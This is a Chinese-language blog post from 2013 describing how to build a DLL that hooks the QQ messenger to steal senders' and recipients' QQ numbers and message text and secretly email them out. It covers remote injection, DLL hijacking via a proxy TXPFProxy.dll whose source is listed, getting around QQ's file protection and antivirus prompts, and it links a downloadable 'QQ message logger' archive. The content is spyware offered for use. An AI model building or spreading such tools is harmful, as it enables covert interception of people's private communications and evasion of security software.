寫一個簡單DLL 獲取QQ消息的DLL,貌似網(wǎng)上有賣這個,但貌似對于QQ2013是不行的,因為他用動態(tài)劫持,貌似最新版用QQ劫持都有點不行。我測試用遠(yuǎn)程注入,你可以自己寫代碼實現(xiàn)遠(yuǎn)程注入軟件也可以網(wǎng)上下載遠(yuǎn)程注入軟件,我為了方便大家把自己寫非常遠(yuǎn)程軟件上傳到這里,方便你測試。我先截一下效果圖 
這個我只是簡單獲取 發(fā)送方QQ 號 和目標(biāo)的QQ號 和 文本內(nèi)容,你如果有其他需求,自己可以添加對應(yīng)的HOOK的QQ API獲取對應(yīng)信息,也可以上網(wǎng)百度或者google一下。記住發(fā)送郵件要用線程不然會阻塞QQ。代碼你可以任意修改,任意發(fā)布
我這里只是寫了簡單的DLL,你可以一個exe 主程序,這個主程序可以后臺運行,當(dāng)發(fā)現(xiàn)有QQ進(jìn)程 ,并且沒有注入你的DLL,你就可以注入DLL,這是一個比較可行的辦法。如果殺毒軟件攔截,你直接添加信任,下次就不會出現(xiàn)提示框了,QQ對于遠(yuǎn)程注入會認(rèn)為合法。但對于DLL劫持加載DLL 會阻止。我劫持lpk.dll 和 msimg32 都會攔截,而且金山殺毒只要你復(fù)制 這樣名字的dll 都會報毒,但你掃描他又認(rèn)為沒有毒,可見殺毒這樣的DLL原理還是比較簡單,我估計金山是對shell 進(jìn)行掛鉤 。 但貌似如果我用寫編譯器可以生成這樣的文件,殺毒軟件是不會報毒,我設(shè)想我就用c 語言 fopen fwrite fread 寫一個 exe 應(yīng)該殺毒軟件就不會報毒了,或許這是金山的BUG。(我沒有測試我的想法,你感興趣可以試試)。我的DLL構(gòu)成:MAIL: ZBase64.h ZBase64.cpp CMail.cpp CMail.h 處理發(fā)送簡單SMTP郵件HOOK:ULHook.cpp ULHook.h 處理HOOKMAIN: main.cpp 業(yè)務(wù)層吧。我發(fā)送郵件時用多線程,當(dāng)你輸入字?jǐn)?shù)超過10個我就開始發(fā)送了(這里只是為了測試用的),你可以定義100或者更長看你的需求。 我測試一下劫持 TXPFProxy.dll(進(jìn)入安全模式把源碼TXPFProxy.dll 改為TXPFProxy1.dll ,因為QQ 用驅(qū)動保護(hù)這個文件不能夠被修改刪除)
但貌似QQ會崩潰后面就不加載這個dll. 不知道是不是的假冒的dll 有問題還是怎么了。
我覺得這樣寫應(yīng)該沒有問題。。。
1 #include <Windows.h>
2 #include <process.h>
3 4 #pragma comment(linker,"/EXPORT:DllCanUnloadNow=TXPFProxy1.DllCanUnloadNow")
5 #pragma comment(linker,"/EXPORT:DllGetClassObject=TXPFProxy1.DllGetClassObject")
6 #pragma comment(linker,"/EXPORT:DllRegisterServer=TXPFProxy1.DllRegisterServer")
7 #pragma comment(linker,"/EXPORT:DllUnregisterServer=TXPFProxy1.DllUnregisterServer")
8 #pragma comment(linker,"/EXPORT:GetProxyDllInfo=TXPFProxy1.GetProxyDllInfo")
9 10 void Init(
void*)
11 {
12 Sleep(10000);
13 LoadLibraryA("CULHook.dll");
14 }
15 16 int __stdcall DllMain(_In_ HANDLE _HDllHandle, _In_ DWORD _Reason, _In_opt_ LPVOID _Reserved)
17 {
18 if(_Reason == DLL_PROCESS_ATTACH)
19 {
20 _beginthread(Init,0,NULL);
21 }
22 23 }
現(xiàn)在對QQ的DLL劫持 不是那么好做了啊,算了,反正我對這個不感興趣,只是好玩,基本已經(jīng)達(dá)到我的要求,我又不要賣這個軟件。
附件代碼:
/Files/xvsdf100/QQ消息記錄器.zip
posted on 2013-05-10 13:12
小魚兒 閱讀(4671)
評論(1) 編輯 收藏 引用